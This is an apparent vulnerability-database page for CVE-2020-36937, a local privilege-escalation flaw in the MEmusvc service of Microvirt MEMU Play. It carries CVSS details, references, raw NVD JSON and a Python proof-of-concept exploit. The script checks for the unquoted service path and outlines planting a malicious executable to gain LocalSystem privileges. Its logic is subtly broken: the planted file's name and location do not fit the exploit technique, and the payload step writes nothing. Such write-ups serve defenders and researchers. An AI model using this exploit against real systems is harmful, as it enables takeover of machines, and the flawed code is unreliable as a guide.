CVE-2020-36937

Description

Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Microvirt MEMU Play 3.7.0（及可能更早版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2020-36937 PoC - MEmusvc Unquoted Service Path
# This PoC demonstrates the unquoted service path vulnerability in MEmusvc
# Target: Microvirt MEMU Play 3.7.0 MEmusvc Windows Service

import os
import sys
import subprocess
import shutil

# Configuration
MALICIOUS_EXE_NAME = "Program.exe"  # Malicious executable name based on path structure
SERVICE_NAME = "MEmusvc"
MALICIOUS_DIR = r"C:\Program Files\Microvirt\MEMU"  # Path where to place malicious exe

def check_vulnerability():
    """Check if the target service exists and is vulnerable"""
    try:
        # Query service configuration using sc command
        result = subprocess.run(
            ["sc", "qc", SERVICE_NAME],
            capture_output=True,
            text=True
        )
        
        if result.returncode == 0 and "BINARY_PATH_NAME" in result.stdout:
            # Extract the binary path from service config
            for line in result.stdout.split('\n'):
                if 'BINARY_PATH_NAME' in line:
                    print(f"[+] Service found. Path: {line}")
                    # Check if path is unquoted (vulnerability exists)
                    path = line.split(':', 1)[1].strip() if ':' in line else line
                    if '"' not in path and ' ' in path:
                        print("[+] VULNERABLE: Service path is unquoted!")
                        return True
                    else:
                        print("[-] NOT VULNERABLE: Service path is properly quoted")
                        return False
        else:
            print(f"[-] Service '{SERVICE_NAME}' not found")
            return False
    except Exception as e:
        print(f"[-] Error checking service: {e}")
        return False

def create_malicious_exe(output_path):
    """Create a simple malicious executable (placeholder for actual malware)"""
    # This is a placeholder - in real attack, replace with actual malicious code
    print(f"[*] Creating malicious executable at: {output_path}")
    
    # Example: Create a simple batch script wrapper
    malicious_code = '''@echo off
echo MEmusvc exploit executed with LocalSystem privileges > C:\\Windows\\Temp\\memu_exploit.txt
echo Timestamp: %date% %time% >> C:\\Windows\\Temp\\memu_exploit.txt
'''
    
    # In practice, this would be a compiled executable
    # For demonstration, we show the concept
    print("[!] In real attack, this would be a compiled executable")
    print("[!] The executable would run with LocalSystem privileges")
    return True

def exploit():
    """Main exploitation function"""
    print("=" * 60)
    print("CVE-2020-36937 - MEmusvc Unquoted Service Path Exploit")
    print("=" * 60)
    
    # Step 1: Check if vulnerable
    if not check_vulnerability():
        print("\n[-] Exploitation aborted - target not vulnerable")
        return False
    
    # Step 2: Create malicious executable
    malicious_path = os.path.join(MALICIOUS_DIR, MALICIOUS_EXE_NAME)
    
    # Check if we have write permissions
    if not os.access(MALICIOUS_DIR, os.W_OK):
        print(f"[-] No write permission to {MALICIOUS_DIR}")
        print("[-] This exploit requires low-privilege code execution")
        return False
    
    # Step 3: Place malicious executable
    if create_malicious_exe(malicious_path):
        print(f"[+] Malicious executable would be placed at: {malicious_path}")
        print("[+] On next service restart, the malicious code will execute")
        print("[+] Code will run with LocalSystem (NT AUTHORITY\SYSTEM) privileges")
    
    return True

if __name__ == "__main__":
    print("\n[*] This is a demonstration of CVE-2020-36937")
    print("[*] For authorized security testing only\n")
    exploit()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2020-36937
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2020-36937
[3] CVE Details https://www.cvedetails.com/cve/CVE-2020-36937/
[4] VulDB https://vuldb.com/cve/CVE-2020-36937
[5] https://www.exploit-db.com/exploits/49016
[6] https://www.memuplay.com/
[7] https://www.vulncheck.com/advisories/memu-play-memusvc-unquoted-service-path

Raw JSON Data

JSON

{"cve": {"id": "CVE-2020-36937", "sourceIdentifier": "[email protected]", "published": "2026-01-25T14:15:48.493", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microvirt MEMU Play 3.7.0 contains an unquoted service path vulnerability in the MEmusvc Windows service that allows local attackers to potentially execute arbitrary code. Attackers can exploit the unquoted binary path to inject malicious executables that will be run with elevated LocalSystem privileges."}, {"lang": "es", "value": "Microvirt MEMU Play 3.7.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio de Windows MEmusvc que permite a atacantes locales ejecutar potencialmente código arbitrario. Los atacantes pueden explotar la ruta binaria sin comillas para inyectar ejecutables maliciosos que se ejecutarán con privilegios elevados de LocalSystem."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49016", "source": "[email protected]"}, {"url": "https://www.memuplay.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/memu-play-memusvc-unquoted-service-path", "source": "[email protected]"}]}}